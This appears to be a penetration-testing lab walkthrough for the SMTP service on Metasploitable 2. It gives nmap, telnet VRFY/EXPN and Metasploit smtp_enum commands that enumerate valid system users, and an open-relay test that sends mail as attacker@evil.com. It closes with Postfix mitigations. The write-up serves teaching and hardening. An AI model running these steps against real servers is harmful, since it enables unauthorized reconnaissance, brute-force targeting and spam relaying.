Home/ Modules/ SMTP

Port 25/tcp — Simple Mail Transfer Protocol

SMTP — User Enumeration & Banner Disclosure

Unauthenticated Username Enumeration via VRFY/EXPN Commands

CVE: N/A (Misconfiguration) Port: 25/tcp Impact: Info Disclosure Tool: Netcat / Metasploit
Medium
Service
Postfix smtpd
Attack Type
Information Disclosure
MSF Module
auxiliary/scanner/smtp/smtp_enum
Result
✓ Valid Users Enumerated
01

Vulnerability Overview

SMTP (Simple Mail Transfer Protocol) is used to send email between servers. Metasploitable 2 runs Postfix smtpd on port 25. While not directly exploitable for remote code execution, the service leaks sensitive system information through its banner and unauthenticated VRFY/EXPN commands.

VRFY and EXPN allow any unauthenticated client to verify whether a username exists on the system. This is a critical reconnaissance step — valid usernames can fuel SSH/Telnet brute-force attacks.
02

Service Detection

bash
nmap -sV -v -p 25 <target-ip>
Nmap SMTP Service Version Scan
SMTP Nmap
04

User Enumeration via VRFY

After connecting, use the VRFY and EXPN commands to check if users exist on the system:

smtp
# Connect to SMTP
telnet <target-ip> 25

# Initiate SMTP session
HELO attacker.com

# Verify if these users exist (200 = valid, 550 = invalid)
VRFY root
VRFY msfadmin
VRFY postgres
VRFY user

# Expand mailing list / alias
EXPN postmaster
VRFY Command — Enumerating Valid System Users
SMTP User Enumeration

A 252 or 250 response confirms the username is valid. A 550 response means no such user exists. Confirmed users can now be targeted in follow-on attacks like SSH/Telnet brute force.

05

Testing for Open Relay

Test whether the server will relay emails to external domains (open relay = potential spam abuse):

smtp
MAIL FROM:attacker@evil.com
RCPT TO:victim@external.com
DATA
Subject: Open Relay Test

This is a test message.
.
QUIT

If the server accepts the message and attempts delivery to external.com, it's an open relay and can be abused for spam or phishing operations.

06

Automated Enumeration — Metasploit

bash
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target-ip>
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
run
07

Results & Impact

Outcome

  • SMTP banner revealed server software version and hostname
  • VRFY command confirmed valid system users: msfadmin, root, postgres
  • Enumerated users can now be targeted in SSH / Telnet brute-force
  • Open relay risk identified for spam abuse

Detection & Mitigation (Blue Team)

  • Disable VRFY and EXPN commands in Postfix: set disable_vrfy_command = yes
  • Sanitize banner messages — avoid leaking server version details
  • Configure Postfix to prevent open relay — restrict mynetworks
  • Monitor SMTP traffic for anomalous VRFY/EXPN command usage
  • Apply firewall rules to restrict port 25 to known mail servers